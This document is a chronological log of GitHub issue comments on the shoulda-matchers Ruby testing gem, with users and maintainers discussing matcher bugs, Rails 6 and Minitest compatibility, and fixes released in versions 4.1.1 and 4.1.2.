[2019-07-09 09:47] PeterMozesMerl commented on #1232
The master fixes the issue for integer[]
One of my project has a character varying[] field too. The master branch didn’t fix that one. The message is the same:

'After setting :filters to ‹""› -- which was read back as ‹[]› -- the ...'

[2019-07-09 15:39] mcmire commented on #1232
@PeterMozesMerl Ah, gotcha. Okay, let me take another look at it and get back to you.

[2019-07-10 05:56] mcmire commented on #1232
@PeterMozesMerl Okay, I did some local tests with an array column that was a varchar, and I was able to reproduce your failure, but only if I did _not_ have a presence validation on the attribute. So, do you have a presence validation on your `filters` attribute?

[2019-07-10 09:37] PeterMozesMerl commented on #1232
Yes. I do. I double-checked it with two models. The db-related comments were generated by the 'annotate' gem.

[code]

4.0.1:

[code]

Gem without version:
[code]

Using "gem 'shoulda-matchers', git: 'https://github.com/thoughtbot/shoulda-matchers.git'":

[code]

I copy-pasted everything to eliminate any mistake.

Maybe I will create a test project for you soon.

[2019-07-10 10:29] PeterMozesMerl commented on #1232
Rails 5.2.3, PostgreSQL

I removed the .ruby-version file and the Ruby version from the Gemfile as they break RVM on Mac at the moment.

The Gemfile has three versions of shoulda-matchers. (Two commented out).

bundle
rails db:create
rails db:migrate
rspec

https://drive.google.com/open?id=1eBF-ekKXxcpMyQgRhvShLu2usTFG-rEs

[2019-07-11 04:41] mcmire commented on #1232
Ah... I gotcha. Okay, I see what's going on now.

So, I have a suggestion, and you may not like it, but it's this: I would suggest _not_ using `validate_presence_of` in this case. The reason I say this is because you're not actually using a presence validation on your `favorite_numbers` (or `filters`) attribute. Here's the thing: even if I prevented the presence matcher from setting your attribute

[2019-07-11 08:40] PeterMozesMerl commented on #1232
"So, I have a suggestion, and you may not like it, but it's this: I would suggest not using validate_presence_of in this case."

It’s not true I don’t like it. I agree with you since I figured it out what I’ve been using a custom validator.

When I opened the ticket, I believed that the not_nil was part of Rails. If it were true, I would consider it normal to have a related one-liner shoulda-match

[2019-07-12 11:31] pegasusflyhigh commented on #997
The qualifier is ` .ignoring_case_sensitivity`  :)

[2019-07-14 23:46] mcmire commented on #1232
Of course! Cheers!

[2019-07-14 23:46] #1232 closed

[2019-07-15 19:56] bbugh commented on #814
I am seeing this even without `scoped_to` on any association, just a basic uniqueness validation:

[code]

[code]

[2019-07-16 02:37] mcmire commented on #1228
Fixed in [v4.1.1](https://github.com/thoughtbot/shoulda-matchers/releases/tag/v4.1.1).

[2019-07-16 02:37] mcmire commented on #1218
This fix is live in [v4.1.1](https://github.com/thoughtbot/shoulda-matchers/releases/tag/v4.1.1).

[2019-07-16 02:53] mcmire commented on #814
@bbugh I think you might be right about that, I have definitely noticed some oddities. I will put this in the queue for the next version.

[2019-07-16 21:46] dlinch opened #1233 "validates_inclusion_of with_message does not respect interpolated value in the message"
You are able to specify the value that was passed to the validated field inside the message, but shoulda-matchers does not seem to respect this. It is shown in the method documentation [here:](https://apidock.com/rails/ActiveModel/Validations/HelperMethods/validates_inclusion_of)

When I try this locally, my code looks like this:
[code]

And the error message I receive is:
[code]

I believe this i

[2019-07-22 07:42] coorasse opened #1234 "NoMethodError: undefined method `object_class' for ActiveRecord::Store::IndifferentCoder"
The latest release 4.1.1 performs a call to `object_class` in `validate_presence_of_matcher.rb:318`, raising an error
[code]

[2019-07-22 16:39] mcmire commented on #1234
Hey @coorasse, thanks for the report. What does your model look like so that I can reproduce this?

[2019-07-22 19:38] dark-panda commented on #1234
I'm experiencing this too. The code is effectively:

[code]

[2019-07-23 06:58] tnandate commented on #1234
I'm experiencing a similar problem too.
[code]

raising an error
[code]

[2019-07-23 17:26] stas commented on #1234
This was introduced in https://github.com/thoughtbot/shoulda-matchers/commit/b3025dc9a52958a86406183472272ef2b8064085

Any model attribute using the [`#serialize`](https://api.rubyonrails.org/classes/ActiveRecord/AttributeMethods/Serialization/ClassMethods.html#method-i-serialize) will fail.

Current workaround is to downgrade to the previous version.

[2019-07-23 20:09] mcmire commented on #1234
Thanks for the reports — I'll make this a priority and try to get a fix out for this soon.

[2019-07-25 19:25] theycallmeswift opened #1235 "Don't call `object_class` on serializers in validate_presence_of"
Hey folks --

I'm using a custom module for serialization and have a validator on presence. There's no guarantee that a module responds to the `object_class` method we're calling on it in the matcher. The fix for this is to use something like `reponds_to?(:object_class)` before calling the method. I believe this has been addressed in the serializer matcher.

*Model*:
[code]

*Serializer*:
[code]

[2019-07-25 19:52] mcmire commented on #1235
Hey @theycallmeswift! We've already got this reported in #1234 but I appreciate the example. We will have this fixed shortly!

[2019-07-26 03:23] GeneDer commented on #1233
I am encounter the same issue, currently just use regex to test the message. Hope there will be a fix coming out soon

[2019-07-30 04:38] mcmire commented on #1235
@theycallmeswift I have a branch that should fix this issue. Can you temporarily switch to the `fix-presence-with-custom-serializer` branch in your Gemfile and see if that makes your test pass?

[2019-07-30 04:38] mcmire commented on #1234
@coorasse @dark-panda @tnandate @stas I have a branch that should fix this issue. Can you temporarily switch to the `fix-presence-with-custom-serializer` branch in your Gemfile and see if that makes your tests pass?

[2019-07-31 00:55] theycallmeswift commented on #1235
@mcmire yep, seems to have done the trick!

[2019-07-31 07:17] meric426 commented on #1234
This solved the issue for us. Merge away :)

[2019-07-31 11:44] Tashows commented on #901
I faced that issue too. Apparently I hadn't installed `fastimage`. Setting `image_magick` didn't work even after I updated it to latest version. Even after installing `fastimage` I had to set it as the analyzer. Seemed like it wasn't selected by default as mentioned in the docs, however I didn't dig into the matter any deeper. So `Shrine.plugin :store_dimensions, analyzer: :fastimage` made everyth

[2019-07-31 13:21] coorasse commented on #1234
The issue is solved for me using the branch `fix-presence-with-custom-serializer`

[2019-07-31 13:42] tnandate commented on #1234
I confirmed that my test passed.

[2019-08-01 03:36] mcmire commented on #1234
This should now be fixed in 4.1.2!

[2019-08-01 03:36] #1234 closed

[2019-08-01 03:36] mcmire commented on #1235
This should now be fixed in 4.1.2!

[2019-08-01 03:36] #1235 closed

[2019-08-02 11:42] ddavisgraphics commented on #646
I had the same issue with a reverse polymorphic association, the only error message was undefined method 'class_name'.  Maybe that is expected, but even in the stack trace it was ambiguous and looked like it could have been a number of different errors.  Is there a way to add a more concise error message?

Here is the code in case it helps.

[code]

[2019-08-29 03:08] trivv opened #1239 "error message when validate numericality"
[code]
I received this message when I customize message not_a_number like this:
[code]
Is there something wrong? why the expected message changed value to "0", I expect that it still keep "abcd" like your code ``` NON_NUMERIC_VALUE = 'abcd' ```

[2019-08-29 05:53] mcmire commented on #1239
Hey @trivv. I think this might just be a bug in how the matcher works. I'm surprised it's taken this long for this to surface. We can fix this but in the meantime you might have to write a custom test to get around it. Sorry about that.

[2019-08-29 19:49] zfletch opened #1240 "validate_absence_of fails on Postgres array columns"
It looks like `validate_absence_of` doesn't work with array columns. For example, given a Rails application (using Postgres) that has migration with this line:

[code]

and the following model validations:

[code]

and the following test:

[code]

the matcher fails and produces the error below:

[code]

I think this is happening because the value chosen to test for presence ([here](https://github.

[2019-09-02 20:38] connorshea commented on #1115
I would like to echo the sentiment of Dremni's most recent comment. I just spent 15 minutes trying to figure out the source of my test failing, when it was because of a typo ('is aleady in your library' where it was expecting 'is already in your library').

It'd be really nice if it properly diff'd it when the only problem is the message being different.

[2019-09-03 05:01] trivv commented on #1239
Thanks for your reply, I replaced it with basic rspec, I'm still waiting your solution and apply it later.

[2019-09-03 15:45] mcmire commented on #1115
@connorshea Yeah, I agree in theory that would be nice. The thing about this is that there can be multiple messages on a record, not just one. The matcher doesn't know which one corresponds to the one you were trying to add, so it just prints out all of the messages. We might be able to do some kind of Levenshtein matching to figure that out, and then show some kind of "did you mean" message. Perh

[2019-09-03 15:53] connorshea commented on #1115
Yeah, that’d work as well :)

[2019-09-04 05:05] #1219 closed

[2019-09-05 09:04] jmuheim commented on #646
I'm getting this error with the following models:

[code]

Can anybody see the problem? I don't see it.

[2019-09-09 23:26] justindoody opened #1242 "FK's eligible for not nulls"
- [ ] BrokerageSubscriptionDetail#utility_account
- [ ] Contact#owner
- [ ] HasoffersTransaction#user
- [ ] HasoffersTransaction#promo_code
- [ ] Incentive#promo_code
- [ ] InteractionEvent#user
- [ ] MoveRequest#old_account (11 violations)
- [ ] MoveRequest#utility
- [ ] NeedsReviewReason#product_eligibility
- [ ] Note#target (2 violations)
- [ ] OnBillSubscription#on_bill_item
- [ ] OwnedValidat

[2019-09-18 13:57] marceloperini commented on #966
Same problem with me. But I realized that it happens when I added the presence validation to attribute:

[code]

tests cases:

[code]

this returns:

[code]

### System
**ruby version:** ruby 2.6.3p62 (2019-04-16 revision 67580) [x86_64-linux]
**rails version:** 5.1.6.2
**shoulda-matcher version:** 4.0.1

[2019-09-18 15:07] mcmire commented on #966
@marceloperini Try adding an `allow_nil: true` option to your numericality validation in your model. That will instruct Rails to not run that validation if `slots` is nil.

[2019-09-18 15:15] marceloperini commented on #966
It's not worked. But if I add `if: ->(object_model) { object_model.slots.present? }` on numericality validation works.

[code]

[2019-09-18 16:58] marceloperini commented on #966
@mcmire I think this is not an issue from Shouda Matchers, this is an issue from ActiveModel. Because if I run this on console, using the same validation explained from my first commentary:

[code]

raises the same error: `ArgumentError: comparison of Integer with nil failed`

[2019-09-18 17:30] mcmire commented on #966
@marceloperini Yup, exactly! ActiveModel is attempting to run your numericality validation by calling `slots` and making use of its return value. But if `slots` is nil, it can't do that. Hence the `if` or `allow_nil` / `allow_blank`, so that if `slots` is nil, then it will skip that validation.

[2019-09-18 17:37] marceloperini commented on #966
yep, you're right! Thanks.

[2019-09-20 01:54] sameera207 commented on #951
Had the same issue, got it working by adding

[code]

as mentioned by most of the people in this thread

[code]

[2019-09-21 19:35] samstickland opened #1244 "model_name implementation in allow_value_matcher is not checking classes `model_name`"
The implementation is:

[code]

But I believe this should be:

[code]

This "bug" is quite subtle.. It's typically not found because the rails_shim does this:

[code]

And we are using a version of reform-rails that provides and error object that does not respond to `generate_message`

[2019-09-21 21:00] samstickland commented on #1244
I'm happy to submit a PR for this if it looks like something that would be accepted, and someone can point me towards where the tests for this live.

[2019-09-22 21:41] samstickland commented on #1244
Ah, you can ignore this issue. It turns out that reform-rails is delegating to a ActiveModel errors object, but it didn't have a `respond_to?` method configured. I'll raise a PR on that gem instead.

[2019-09-22 21:41] #1244 closed

[2019-09-24 14:06] mjankowski opened #1245 "Issue with validates uniqueness and STI/polymorphic models on rails 6?"
This feels similar to this long-ago bug - https://github.com/thoughtbot/shoulda-matchers/issues/203 - which was fixed here - https://github.com/thoughtbot/shoulda-matchers/pull/592

Model of:

[code]

Spec of:

[code]

Relevant output is:

[code]

That `::Producu` on the very end there in the error makes me suspect that we're calling `next` on a string with `Product` (or something?) somewhere in t

[2019-09-25 16:38] dompham opened #1246 "Updating to Rails 6 seems to changes belong_to behavior"
Using Rails 5, we had the test below *not* instantiating an instance to check the association.

`it { is_expected.to belong_to(:some_class)`

After updating to Rail 6, this spec fails because the same line tries to instantiate and run the class's validation (which at the moment will give nil errors as it's missing instantiation parameters).  The 2 solutions we came up with were:
- Use a factory to

[2019-09-25 16:48] #1246 closed

[2019-09-28 16:12] mcmire commented on #1246
@dompham Sorry I was on vacation! Did you figure this out? When you upgraded Rails, did you change any of the initializers? ActiveRecord has a setting, `belongs_to_required_by_default`, which governs whether `belongs_to` associations will add a presence validation automatically, and the matcher picks up on this setting as well. Did this change by chance?

[2019-09-28 16:18] dompham commented on #1246
@mcmire I did figure this out - pretty much exactly what you said :). Thanks!

[2019-10-08 03:42] victorhazbun commented on #1184
is the version 4.0.0 removed? or what happened?

[2019-10-08 03:44] victorhazbun commented on #1184
I fixed it by upgrading to the version 4.1.2

`gem 'shoulda-matchers', '~> 4.1.2'`

[2019-10-16 20:06] jfcampos1 opened #1247 "shoulda-matcher could not found test class name when work with rails 6 minitest"
I'm using rails 6 and with most of ActionController matchers is not working.

## Tests Controller
[code]

## Errors
[code]

## Gemfile
[code]

I think this is someway relate to this issues #1229, #1217, #1158.

I have add this line to make it work for some of the matchers as you suggest in #1158 :
[code]
But in the matchers that need the className is not working at all.

[2019-10-16 22:55] mcmire commented on #1247
We're a bit behind in supporting Minitest at the moment. I don't think we even test that you can use controller matchers in an ActionDispatch::IntegrationTest (although in theory they should work).

I know the README advises staying on shoulda-matchers 2.x, but given that we are to 4.x now, what if you try upgrading? There's a pre-release version of shoulda-context out that should fix any compatib

[2019-10-17 12:41] jfcampos1 commented on #1247
I just tried what you suggests, it works just at before and I don't need now the
[code]

But its still failing on the same

[code]

[2019-10-17 22:24] mcmire commented on #1247
Hmm, alright. I don't have any immediate insight as to why this could be happening, but I'll look into this to see if there is a workaround.

[2019-10-18 05:01] jfcampos1 commented on #1247
Great thanks!

[2019-10-20 05:07] richard1986 commented on #862
It works for me, it is necessary to add 'required: true' in the Model.rb file and that's it

[2019-10-23 18:20] chase439 commented on #1095
There's a typo the solutions above. It should be:

[code]

`is_expected.to` instead of `is_expected_to`

[2019-10-29 19:42] bf4 opened #1249 "Proposal for active record callbacks matchers"
I just wrote this in case you're interested in using something like it

[code]

[2019-11-01 12:35] superchell commented on #625
I have the same problem. Did you get a fix?

[2019-11-05 10:55] LunaCodeGirl opened #1250 "Should the documentation suggest using the unreleased version of shoulda-context for Minitest users?"
I noticed this comment in #1247. I went ahead and tried this myself and was able to start using the v4.1.2 matchers without issue. I'm using Minitest. I'm curious what's holding back support of minitest with shoulda-context? And even so, should the docs for shoulda-matchers be updated to suggest people use the above suggestion instead of such an old version of shoulda-mathers?

[2019-11-05 10:58] LunaCodeGirl commented on #1250
(Happy to make a PR, to do this, but figured I should ask around before assuming anything)

[2019-11-05 19:33] mcmire commented on #1250
For `shoulda-context`, nothing is really stopping a proper release, although I wanted to check it with existing projects to make sure I didn't break anything. I'm honestly not sure how many people still use it though, so maybe it's not a big deal. What I still have yet to do is wrap up some tests for `shoulda`, so that people can continue to use that instead of having to include `shoulda-context`

[2019-11-10 23:01] VSPPedro opened #1252 "Add `have_rich_text`"
Hello, first of all, thank you all for maintaining and improving this gem.

So, I was wondering if there it's a possibility to add something like this:

[code]

To test ActionText with RSpec. Example:

[code]

I would love to work on this if by chance this suggestion is accepted.

Thank you for your time.

EDIT: For now I'm using a custom matcher:

[code]

[2019-11-11 09:08] #1239 closed

[2019-11-12 07:02] guialbuk commented on #1252
Hi @VSPPedro

Your contribution would be appreciated. Feel free to submit a PR, or even a draft one to receive feedback during your progress.

And feel free to ask any questions 🙂

[2019-11-12 07:05] #1242 closed

[2019-11-14 00:08] CharlieIGG commented on #646
This has also happened to me repeatedly, and each time I end up coming back to this thread (because my memory is bad). How can we add more significant error messages for this?

[2019-11-14 14:20] mcmire commented on #646
#723 should fix this issue. It's just one of many, many PRs that we need to review. @guialbuk is this something you think you could take a look at?

[2019-11-16 04:37] guialbuk commented on #646
For sure. I'm working on having that PR in a state that it can be merged, so we can fix that issue.

[2019-11-16 04:54] guialbuk commented on #1249
Hi @bf4. Than you for your suggestion.
Sure,  one-line tests for callbacks can be very handy.
Fell free to submit a PR and ask any questions during its development. 🚀

[2019-11-18 14:07] xBartu commented on #814
I have the same issue, any update?

[2019-11-19 22:54] VSPPedro commented on #1252
Hi, @guialbuk

Can I ask you a question, please?

So I started to study this project and now I'm wondering if I should create a file named `have_rich_text.rb` or if I should  add this logic inside the `association_matcher.rb`?

[2019-11-21 16:48] mcmire opened #1262 "Intermittent test failures"
This issue exists to collect the intermittent failures that sometimes pop up on Travis.

* [`missing attribute: :scope1`](https://travis-ci.org/thoughtbot/shoulda-matchers/jobs/614520348)

[2019-11-25 04:30] bf4 commented on #1249
I've found conditional callbacks pretty near impossible to test. I stepped through and read the rails code but ended up with this for now. The mess speaks of my just getting something working

[code]

[2019-11-27 09:52] kleytonmr commented on #814
+1

[2019-12-14 03:35] VSPPedro commented on #1262
The link within the description of this issue shows no errors, but I think I found one that shows:

- [missing attribute: :scope1](https://travis-ci.org/thoughtbot/shoulda-matchers/jobs/622356910)

[2019-12-18 14:09] jasonperrone opened #1265 "Test erroneously complaining about optional: true"
Shoulda version: 4.0.0.rc1
Shoulda-context version: 2.0.0.rc2
Shoulda-matchers version: 4.1.2

So check this out. Here is my model:

[code]

and my test has this:

[code]

and yet I get this:
Failure:
EventTest#test_: Event should belong to facility optional: true.  [/home/jason/.rvm/gems/ruby-2.6.5@actioncue/gems/shoulda-context-2.0.0.rc2/lib/shoulda/context/context.rb:62]:
Expected Event to have

[2019-12-18 15:54] jasonperrone commented on #1265
Ok I figured it out and I learned something that might be useful to others who don't understand why they're getting this message. If you define a belongs_to as optional: true, be on the lookout for any validation callbacks which essentially make it not optional. A good example would be your callback referring to the optional relationship. In my example above, I didn't notice I had defined a valida

[2019-12-18 15:54] #1265 closed

[2019-12-18 16:22] mcmire commented on #1265
Thanks for the tips, @jasonperrone. People seem to keep getting hung up on how this matcher works under the hood, so I wonder if we need to tweak the failure message to guide people better? WDYT?

[2019-12-18 16:24] jasonperrone commented on #1265
The message does point out "there should not be a presence validation on :facility", so maybe in parenthesis it could say "see: without_validating_presence option".

[2019-12-30 18:46] diebas commented on #1245
This is happening to me as well

[2020-01-19 17:08] VSPPedro commented on #1262
Hi, @mcmire, would you mind if I submit a draft with only comments just to take notes.

For now I didn't found any solution for this. What I know is that one test is influencing the record of another. I managed to isolate the smallest possible scenario, but I still don't understand what is the cause of the failure.

I'll keep digging. :smile:

[2020-01-20 22:20] ngouy commented on #1245
it's likely due to :
[code]

It triggers a `TestModelCreator.create`, which triggers a `model_name#next`, which triggers `"MySTIType".next` => `MySTITypf` (or For exemple `"Product".next` for @mjankowski)

I don't know why. I just tracked it down to this. I have the exact same problem, my `Form` become a `Forn`

[2020-01-20 23:02] mcmire commented on #1262
@VSPPedro Yeah that's fine with me! Thank you so much for looking into this!

[2020-01-21 17:20] mcmire commented on #1245
Yes, that behavior is intentional. The uniqueness matcher will:

* take the record you provide and ensure that it is saved to the database (this record is now the "existing" record)
* build a new instance of the record (without saving) by going through each of the attributes that you specify (attribute that you're testing + scopes you specify) and copying them from the existing record
* assert tha

[2020-01-21 17:36] mjankowski commented on #1245
My issue was happening in a rails six upgrade of branch of Upcase, which is a public repo, so I can actually link you to the "fix" I came up with.

Prior to this commit - https://github.com/thoughtbot/upcase/commit/9f0792bda0140f74d1a705069d26fe50d538eff1 - I was seeing the `Invalid single-table inheritance type: Show is not a subclass of Shoulda::Matchers::ActiveRecord::Uniqueness::TestModels::Pr

[2020-01-21 20:30] ngouy commented on #1245
I think it's a rails "issue". Maybe in rails (ActiveRecord) 5, models weren't checking, or not the same way, what you were putting in the `type` column of an STI'ed model instance. I think the error pop outside of shoulda_matchers, exactly BECAUSE whatever `Shoulda::Matchers::ActiveRecord::Uniqueness::TestModels::PutWhatYouWantHere` will never be a parent of your subtype

[2020-01-21 20:48] ngouy commented on #1245
not sure what side effect it has, but removing the `.dup` from
[code]

[2020-01-22 16:00] mcmire commented on #1245
@ngouy Hmm.... I wonder why I ended up doing that. Thanks for the tip. I'll try this out and see if it breaks anything.

[2020-01-23 16:48] VSPPedro commented on #1252
I'll close this issue because the PR with the solution was merged! :tada:

[2020-01-23 16:48] #1252 closed

[2020-01-23 21:03] ngouy commented on #1245
👍

[2020-01-24 08:07] O330oei commented on #1252
🤪😎🤪

Sent Samsung S8 Droid
________________________________
From: Pedro Paiva <notifications@github.com>
Sent: Thursday, January 23, 2020 8:48:39 AM
To: thoughtbot/shoulda-matchers <shoulda-matchers@noreply.github.com>
Cc: Subscribed <subscribed@noreply.github.com>
Subject: Re: [thoughtbot/shoulda-matchers] Add `have_rich_text` (#1252)

I'll close this issue because the PR with the solution was me

[2020-01-28 16:49] mikewiltbank commented on #745
should validate_uniqueness_of(:node_id).scoped_to(:label_id).case_insensitive

[2020-02-18 13:05] nikosmichas opened #1277 "Make has_expected_db_index? check optional on HaveSecureTokenMatcher"
The check here could be optional
https://github.com/thoughtbot/shoulda-matchers/blob/c0960bd72dd41c4e9bd8b4375254f539776bfe95/lib/shoulda/matchers/active_record/have_secure_token_matcher.rb#L78-L80

`has_secure_token` encourages to use an index but does not enforce it.

https://github.com/rails/rails/blob/a273da7619ac6a2b2f98532a5610238c68ad219b/activerecord/lib/active_record/secure_token.rb#L31

[2020-02-20 23:30] allisonphillips commented on #625
I am also experiencing this when trying to add shoulda matcher specs for `has_and_belongs_to_many` relationships for classes that are not dependent on any gem. At first I thought I had forgotten to configure something, but then I reproduced by writing the same example for similar classes that has long been functioning in a production environment without issue. All this syntax works:

[code]

But a

[2020-02-21 18:54] mcmire opened #1279 "with_message + strict + against doesn't seem to work"
When using `allow_value` in combination with `with_message(..., against: ...)` and `strict`, `against` seems to be getting ignored.

Example:

[code]

This will produce an error like:

[2020-02-26 03:50] EdOverride opened #1280 "Add option to pass model manually, without RSpec.describe"
I think it would be a nice addition to be able to pass model manually to each validator, for example:

[code]

The reason being, that if you don't directly test models, but let's say a gem, that adds associations to different models.

So it's possible to do:
[code]

Instead of, what is forced now, to:
[code]

[2020-02-26 16:21] mcmire commented on #1280
`should` is a shortcut for `is_expected.to`, which is a shortcut for `expect(subject).to`. In other words, you don't pass the model through the matcher, but through the argument passed to `expect`. So you are free to pass whatever you want in that slot (just as long as it's an instance of a model, not the model itself — that's how most of these matchers work). In your case, you could say:

[code]

[2020-03-11 09:01] recurator opened #1281 "have_db_column.().with_options() should raise error on misspelled argument"
ruby 2.6.3p62 (2019-04-16 revision 67580) [x86_64-linux]
Rails 6.0.0
RSpec 3.8
  - rspec-core 3.8.2
  - rspec-expectations 3.8.4
  - rspec-mocks 3.8.1
  - rspec-rails 3.8.2
  - rspec-support 3.8.2
shoulda-matchers (4.1.2)

spec/models/comment_spec.rb:
[code]

*** Note spelling error: preccision

It is expected to raise error but no error is raised.

[2020-03-20 15:30] yousefabed commented on #1095
I have an optional belongs to and the same time I need a conditional presence validation , the below does not seems to work
[code]

This will give the following error:
Expected Transaction to have a belongs_to association called category (and for the record not to fail validation if :category is unset; i.e., either the association should have been defined with `optional: true`, or there should not

[2020-03-20 18:31] #1277 closed

[2020-03-24 16:36] redline-gh opened #1283 "User Uniqueness Test Failing: "undefined method `downcase' for nil:NilClass""
In my `user_spec.rb` I have the following uniqueness test:
`it { should validate_uniqueness_of(:email).ignoring_case_sensitivity }`
On running `rspec`, I get an error:
[code]
My user model is validating the email like this:

[code]

I am setting up my user factory like this:
[code]

Removing:

[code]
From my user model causes the test to pass. Shouldn't `ignoring_case_sensitivity` account for the

[2020-03-24 17:16] mcmire commented on #1283
@Git-Ibraheem Thanks for the report. So usually the uniqueness matcher will test that the validation you have on the model is configured to be either case-sensitive or case-insensitive. There are specific tests around this — for instance, if testing that it's case-insensitive, the matcher will test that if you have two records with the same value for the attribute under test, but the cases are dif

[2020-03-24 17:37] Git-Ibraheem commented on #1283
Thanks that fixed it. I thought factories were loaded in automatically, as I was running many other tests on the factory generated user object, and altering the factory would cause some to fail?

[2020-03-24 20:22] mcmire commented on #1283
Factories aren't loaded automatically, no. Do you have a `factory_spec.rb` that iterates through all of the factories and checks if they're valid by chance? I've seen that in some projects.

[2020-03-29 02:23] brendon commented on #1166
Regarding this, is there an easy way to deal with this warning when using Minitest given that we're currently using `shoulda-matchers` 2 per the documentation:

[code]

[2020-03-30 16:10] mcmire commented on #1166
Hey @brendon. So the README does say to use shoulda-matchers 2, although there is a pre-release out for Shoulda that should allow you to use the latest version of shoulda-matchers. Try changing your Gemfile to:

[code]

Give that a shot and let me know how that works for you.

[2020-03-30 20:18] brendon commented on #1166
Hi @mcmire, I just did a quick test substituting in the gems you listed above and got:

[code]

I added in `shoulda-matchers` but unfortunately this didn't fix the error. I can dig deeper for you if need me, let me know what you'd like me to look for :)

[2020-03-30 21:36] mcmire commented on #1166
@brendon Would you mind making a new issue? That way I can help you there and we don't spam the people mentioned on this issue.

[2020-03-31 00:45] brendon opened #1284 "Minitest: warning: BigDecimal.new is deprecated; use BigDecimal() method instead."
Using the recommended Minitest gem structure results in the `BigDecimal` warning because the fix wasn't back ported to the `2.x` branch.

Previously discussed in: #1166 @mcmire

[code]

[2020-04-01 15:31] vesh95 commented on #1154
Sorry for my English. When I tries use without_presence_validation i have exception
[code]

[2020-04-01 15:36] vesh95 commented on #1154
Sorry. I use `without_presence_validation` instead `without_validating_presence`

[2020-04-01 19:46] mcmire commented on #1154
@vesh95 It looks like you're using `without_presence_validation` on `validate_presence_of`. You will probably want to use it on `belong_to`.

[2020-04-03 04:17] Drenmi opened #1285 "Feature proposal: ActiveRecord Attributes matchers"
Hello! 👋

I tried to search the open issues to see if this was already filed. Hopefully this won't be a duplicate.

### Background

With Rails 5, ActiveRecord introduced the new [Attributes API](https://blog.bigbinary.com/2018/12/11/rails-5-attributes-api.html).

### Proposal

I would like to be able to test that the correct attributes have been defined.

**Example:**

[code]

This interface was t

[2020-04-03 16:13] mcmire commented on #1285
Hey @Drenmi! You're right, you're the first person to bring this up. So I have two immediate thoughts about this. The first is that in my experience, not many people use or even know about the Attributes API — even long-time Rails users. There are some people (I know this because this has happened at my job) who think that custom types add an unnecessary layer of complexity and that if you want to

[2020-04-03 20:13] mcmire commented on #1153
Sorry, I've updated the comment now :)

[2020-04-06 03:49] Drenmi commented on #1285
Hi, @mcmire!

I think your point is sound. 🙂 Let me elaborate a little on our use of the Attributes API. There are currently three use cases in our application.

1. As you mentioned, we have a single custom type. It is a `Duration` type that lets us put in and get out `ActiveSupport::Duration` objects (serialized to an integer representing the number of seconds) to and from the database. We use th

[2020-04-13 15:18] the-codetrane commented on #814
I was able to get this to work when using attributes on the table itself:

[code]
If you're willing to live with the attributes v. association object, this will pass

[2020-04-13 15:49] gmmcal commented on #814
I'm not even sure if this issue still occurs. I've first opened this error because it failed to validate scoped to more than one association at the same time. I do vaguely remember that scoping to a single association worked at the moment in time. I'll try to create a demo app that reproduces this error, so we are clear in it. Based on comments, I think we potentially have 2 issues in a single pla

[2020-04-13 17:55] mcmire commented on #814
@gmmcal Sounds good, thank you!

[2020-04-14 14:47] delacruzjames commented on #953
Same issue here. rails 6.0.2.2

`undefined method `configure' for Shoulda::Matchers:Module`

[2020-04-14 14:52] delacruzjames commented on #953
@mcmire

RSpec.configure do |config|
  config.include(Shoulda::Matchers::ActiveModel, type: :model)
  config.include(Shoulda::Matchers::ActiveRecord, type: :model)
end

It works on my end when I added ShouldaMatcher inside RSpec.configure

[2020-04-14 14:54] mcmire commented on #953
@delacruzjames Which version of shoulda-matchers are you using?

[2020-04-15 07:59] gmmcal commented on #814
I've created the simplest example app to show the progress of this issue. on a certain view, this issue seems fixed to me. But, personally, I don't like the limitation on the solution.

I'd like to me able to use shoulda these ways
https://github.com/gmmcal/shoulda-uniqueness-issue-814/blob/master/spec/models/profile_spec.rb#L6
https://github.com/gmmcal/shoulda-uniqueness-issue-814/blob/master/spe

[2020-04-15 08:00] gmmcal commented on #939
@mcmire I think this issue is fixed. tecnically, PR was merged. Haven't tested, tbh.

[2020-04-16 09:22] delacruzjames commented on #953
@mcmire
* shoulda-matchers (3.1.3)
	Summary: Making tests easy on the fingers and eyes
	Homepage: http://thoughtbot.com/community/
	Path: /Users/jamesdelacruz/.rvm/gems/ruby-2.6.5/gems/shoulda-matchers-3.1.3

[2020-04-16 09:24] delacruzjames commented on #953
@mcmire BTW I tried to get the latest version of shoulda-matchers 4.3.0 and it looks fine on my end.

[2020-04-16 14:44] mcmire commented on #953
@delacruzjames Yeah, that's what I would have recommended. :) Glad that worked for you!

[2020-04-18 09:55] cristofer commented on #1284
with Ruby 2.7.1

[code]

[2020-04-20 01:27] biinari opened #1287 "Specs hang when trying to run locally"
Running specs locally hangs with no output when run as `bundle exec rake`

Trying running a unit spec with `DEBUG_COMMANDS=1` to show where the problem lies:

[code]

It looks like the `IO.pipe` used to capture the stdout + stderr from the test command runner is filling up a buffer.

It looks like `rails new` is generating [4143 characters of output](https://gist.github.com/biinari/5e1af3b5155b91f

[2020-04-20 15:03] mcmire commented on #1284
Hey @brendon! Yup, just echoing @cristofer here. I'd like to avoid backporting if we can especially since shoulda-matchers 2.0 was released a pretty good while back. I would try upgrading to shoulda 4.0.0.rc2 in your project which I just released not too long ago and see if that helps clear things up. If that doesn't then we can pursue another route.

[2020-04-20 23:32] brendon commented on #1284
Hi @mcmire, thanks for the update. I tried that again but unfortunately still get the same error:

[code]

[code]

Looks like the helpers aren't being loaded in. Is there anything you'd like me to try?

[2020-04-21 14:49] mcmire commented on #1284
@brendon Yup, sorry, one last thing — in shoulda-matchers 4 (which this loads under the hood) we changed how you need to bring in the gem. So you'll want to throw this somewhere into your `test_helper`:

[code]

[2020-04-21 22:37] brendon commented on #1284
That worked perfectly! :D Thank you so much!

[2020-04-21 22:37] #1284 closed

[2020-04-26 09:33] nimeshnikum commented on #625
@allisonphillips Yes, this was already answered here: https://github.com/thoughtbot/shoulda-matchers/issues/914#issuecomment-195552836

Try dropping the **"s"**. It looks like you have **have_and_belongs_to_many**, the method you want is **have_and_belong_to_many**

[2020-04-27 04:25] shevaun opened #1288 "shoulda-matchers >4.1.1 is incompatible with the active_model_attributes gem"
This is mostly an FYI, since I'm not sure of the best way to resolve this, but:

[These two methods](https://github.com/thoughtbot/shoulda-matchers/blob/v4.3.0/lib/shoulda/matchers/rails_shim.rb#L141-L163) in `rails_shim.rb` use `model.respond_to?(:type_for_attribute)` to determine whether the class under test is an ActiveRecord or ActiveModel (the former returns true and the latter returns false)

[2020-04-27 15:01] mcmire commented on #1288
Hey @shevaun. Yeah, looking at this again, we probably need to change `if model.respond_to?(:type_for_attribute)` to `if model.respond_to?(:columns) && model.respond_to?(:type_for_attribute)`. That would cause NotImplementedError to get raised, which would get picked up at line 157 and then [line 159](https://github.com/thoughtbot/shoulda-matchers/blob/v4.3.0/lib/shoulda/matchers/rails_shim.rb#L15

